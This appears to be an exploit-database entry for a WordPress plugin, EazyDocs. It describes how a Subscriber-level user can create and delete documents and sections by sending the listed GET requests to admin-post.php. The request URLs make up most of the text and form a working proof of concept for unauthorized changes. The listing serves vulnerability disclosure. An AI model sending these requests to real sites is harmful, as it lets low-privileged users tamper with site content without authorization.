Share
## https://sploitus.com/exploit?id=WPEX-ID:7A0AAF85-8130-4FD7-8F09-F8EDC929597E
1. Install the EazyDocs plugin
2. Log in as Subscriber
3. Make GET requests:
- To add a document : https://example.com/wp-admin/admin-post.php?Create_doc=yes&parent_title=doc%201
- To delete a post/document : https://example.com/wp-admin/admin-post.php?Doc_Delete=yes&DeleteID=12
- To add a section : https://example.com/wp-admin/admin-post.php?Create_Section=yes&parentID=90&is_section=sec%201
- To delete a section: https://example.com/wp-admin/admin-post.php?Section_Delete=yes&ID=110

When making requests, the page will redirect to the login page but the action is still completed, log in as Admin to check the result.